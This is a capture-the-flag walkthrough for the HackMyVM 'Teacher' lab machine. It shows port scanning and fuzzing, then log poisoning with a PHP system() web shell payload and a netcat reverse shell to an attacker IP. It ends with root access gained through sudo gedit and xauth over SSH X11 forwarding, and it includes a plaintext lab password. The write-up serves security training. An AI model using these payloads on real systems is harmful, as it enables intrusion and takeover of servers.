NOTES ABOUT Teacher

[ 2022-09-30 ] [ HackMyVM / Teacher ]

Status: Rooted
Skills: Port Scanning, Fuzzing, PHP, LFI, Log Poisoning, RCE, Reverse Shell, x11 Forwarding, xauth
Tools: nmap, wfuzz, shh

PORT SCANNING

$ nmap -v -sS -A -p- 10.0.2.11

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 1e:21:69:d3:57:da:3a:04:0b:6f:f4:50:fb:97:13:10 (RSA)
|   256 36:ee:7f:57:1d:a5:b5:ce:1f:41:ba:b0:43:32:2e:ff (ECDSA)
|_  256 f2:bd:80:dd:e5:05:02:49:c3:3b:9f:83:29:cb:54:96 (ED25519)
80/tcp open  http    Apache httpd 2.4.54 ((Debian))
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-title: Site doesn\'t have a title (text/html).
|_http-server-header: Apache/2.4.54 (Debian)

GETTING IN

$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt -r 5 --hc 404 http://10.0.2.11/FUZZ
[...]
=====================================================================
ID           Response   Lines    Word       Chars       Payload     
=====================================================================

000000201:   200        2 L      2 W        12 Ch       "log.php"
000002052:   200        0 L      2 W        12 Ch       "access.php"
[...]

NOTE ‘14 CHARACTERS’ ON ID PAYLOAD

wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/url-params_from-top-55-most-popular-apps.txt -r 5 --hc 404 http://10.0.2.11/access.php?FUZZ=FUZZ

=====================================================================
ID           Response   Lines    Word       Chars       Payload        
=====================================================================
[...]
000000158:   200        0 L      2 W        12 Ch       "full_text - full_text"
000000155:   200        0 L      2 W        12 Ch       "f - f"  
000000160:   200        0 L      2 W        14 Ch       "id - id" 
000000162:   200        0 L      2 W        12 Ch       "include - include"
[...]

PAYLOAD:

http://10.0.2.11/access.php?id=%3C?php system($_GET["cmd"]); ?%3E

EXPLOIT REVERSE SHELL

http://10.0.2.11/log.php?cmd=nc%20-e%20/bin/bash%2010.0.2.15%20443

PDF FILE:
[ http://10.0.2.11/e14e1598b4271d8449e7fcda302b7975.pdf ]

$ ssh mrteacher@10.0.2.11
mrteacher@10.0.2.11\'s password:ThankYouTeachers
sudo -l

[...]
User mrteacher may run the following commands on Teacher:
    (ALL : ALL) NOPASSWD: /bin/gedit, /bin/xauth
[...]

dba-oracle.com:
"gedit can be called from a command line as long as
the terminal is open in an XWindows environment"

xauth
[ http://www.dba-oracle.com/t_linux_x_windows_mac_os.htm ]

$ ssh -v -X mrteacher@10.0.2.11
[...]
debug1: Requesting X11 forwarding with authentication spoofing.
[...]
$ /bin/gedit "run ok"

$ sudo /bin/gedit
[...]
debug1: channel 1: new [x11]
debug1: confirm x11
"X11 connection rejected because of wrong authentication."
debug1: channel 1: free: x11, nchannels 2
Unable to init server: Could not connect: Connection refused

[ x11-forwarding-ssh-connection-rejected-because-wrong-authentication ]

$ sudo /bin/xauth add $(xauth -f ~mrteacher/.Xauthority list | tail -1)
$ sudo /bin/gedit
debug1: client_input_channel_open: ctype x11 rchan 3 win 65536 max 16384
debug1: client_request_x11: request from ::1 56654
debug1: channel 1: new [x11]
"debug1: confirm x11"

READ ROOT FLAG.

--- Loaded 400 times ---